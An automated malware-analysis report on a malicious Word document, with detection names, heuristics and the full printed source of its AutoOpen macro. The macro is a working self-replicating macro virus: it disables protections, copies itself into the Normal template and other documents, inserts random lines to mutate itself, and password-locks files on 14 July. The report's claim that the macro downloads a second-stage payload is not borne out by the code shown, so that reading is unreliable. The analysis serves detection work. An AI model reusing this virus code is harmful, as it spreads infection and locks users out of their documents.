Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen macro attempts to export a component to 'C:\Te618.sys', indicating an intent to download and execute a second-stage payload. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Doc.Trojan.VMPCK2-1' further support its malicious nature. The document body content is unrelated to the malicious functionality.
Heuristics (5)
- ClamAV: Win.Trojan.Pivis-2 (severity: critical; rule: CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3334 bytes |

SHA-256: 0336d6ed745e65ee81cd9838af6ccf4794cbd56fa182877f2466f1c0550f2843
Detection (ClamAV): Doc.Trojan.VMPCK2-1
Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Te618"
Rem C293N807B54M314J509Q450H74J572R579O806J796Q692Q192R69F949S219E236U257G713P772R308S718U222I552I204N629D60O837O424E494V768I484M673B647U340D425R357J746
Rem G751U821E108A151I187W871N728D257B827R790H450M802M203F364N343M425N49
Sub AutoOpen()
On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
Rem V242V114W632N901N244T74K759F378J526G580F78U111O899F948T440L768S382E325J152O99F691L182W470
.ScreenUpdating = False
Rem K356D703U529C756J461L207H95N169U97K272T749G672G89B322R296F479G340B481F863N754U330M80O409V114U619I149L219
Rem J616F685N602C44D245J583G835U526
End With
With Options
Rem O980H240T129N606N693T97
.ConfirmConversions = False
.VirusProtection = False
End With
Application.VBE.ActiveVBProject.VBComponents("Te618").Export "C:\Te618.sys"
MhTh317 = Application.VBE.SelectedVBComponent.Name
For KF16 = 1 To 20
OoOh613 = ""
Rem
LqKg284 = Application.VBE.ActiveVBProject.VBComponents.Item(MhTh317).CodeModule.ProcCountLines("AutoOpen", vbext_pk_Proc)
Rem H295S309I400T409Q658J949O515F582Q456U282P889G367A294W760N605G507R856C541J73K698L406V983
OqFo42 = Int(Rnd * LqKg284) + 1
Rem L173G87W283O306T318R174H72L452N30H135H759O962S553N190U318N596R714P759G549L564G415I970L582K32I137O153E375C614
DjGt53 = Int(Rnd * 40)
For x = 1 To DjGt53
OoOh613 = OoOh613 & Chr(65 + (Rnd * 22)) & Int(Rnd * 999)
Next x
Application.VBE.ActiveVBProject.VBComponents.Item(MhTh317).CodeModule.InsertLines OqFo42, "Rem " & OoOh613
Rem M908O440P64R699L155F325R50L756S324V803P904T416D953S695J16E164L405C275O848L187U372H770F446F877N374J859N930L329T258G178I2Q840G702J810Q437C410H709H797
Rem V932W838J804W258E693A338P110C290
Rem C798G45H381H947
Rem O89E283A152J547M780B405B311N517N329U769N431Q162B243R950I683R35R483F601U944O14P963
Next KF16
If Day(Now()) = 14 And Month(Now()) = 7 Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, Password:="Atom#1"
End If
Rem L462I404G55F978B389I489D473G628M156V653L390C783K752N831A210C105H128A536O543S81
Rem N289H773A759S708B413T789I960T56V363M766B591K297O647G279S823N985U226P979F533C998P15
Rem J335P212B885B458Q754S209K867S409K348F806M537O88Q257B274V326O363I326
Rem O781E806E955B61R379K119D173B714M560F467Q751J902Q88O712A430J275W801P417Q276I433V121O347C185C432V541L971F378J281L138
Set So775 = ActiveDocument.VBProject.VBComponents
Set Qi968 = NormalTemplate.VBProject.VBComponents
For y = 1 To Qi968.Count
If Qi968(y).Name = "Te618" Then Fi962 = True
Next y
For y = 1 To So775.Count
If So775(y).Name = "Te618" Then Rz209 = True
Next y
If Fi962 = True And Rz209 = True Then Exit Sub
If Fi962 = True And Rz209 <> True Then So775.Import "c:\Te618.sys": ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Fi962 <> True And Rz209 = True Then Qi968.Import "c:\Te618.sys": NormalTemplate.Save
End Sub
Rem G160E645J412Q325O207E582C457U261R378G918O627J97M693U833A542U429
Rem B345M922M406T825P721
Rem L412P178J542S540J508F618L680U370H292D529F583I875L190